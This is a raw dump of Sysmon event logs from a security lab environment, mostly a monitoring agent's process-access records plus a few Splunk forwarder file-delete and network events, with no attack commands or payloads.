Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.721{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000041449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:51.718{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607F5770DE622D5915EB5F6A26471F9A,SHA256=23711AB2D984CD3E1ACFF38D793449840A85096CB281B130FBA62148025C80EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016191Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:51.226{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E39C6E4FA834F7543282D790BC4B6A90,SHA256=97D6328235C2EB6DC03617BB266C38F6334D221290C9220E622B42BC560863ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016192Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:52.302{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED90590A3338A2A0986EF042A02848BA,SHA256=58A8EE791F3365FCC60FC2AD9CA42ED8A3FEEE53E58E0E0BB0E69272ABBD1635,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:52.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000016194Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:53.493{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B81DE33A6633E7393831041B2A7D51,SHA256=2E275434905AA15175E6B89C868D822C3F11560561538D98462268B30FA8FA1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:53.216{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A6019C32D56B6D770787A68AD617A1,SHA256=6B7D0037E999E21530910383231E8ECD53DAB9E019CA2683D14EF5FBEBA81A45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016193Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:51.105{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50082-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016195Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:54.570{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742C314BDAA655FCEB49D66D87EEE418,SHA256=260470E760E097422597CEED9E7BD03F6F6B0B596D2C58316FA6D3BB58270ECA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.790{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:54.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program 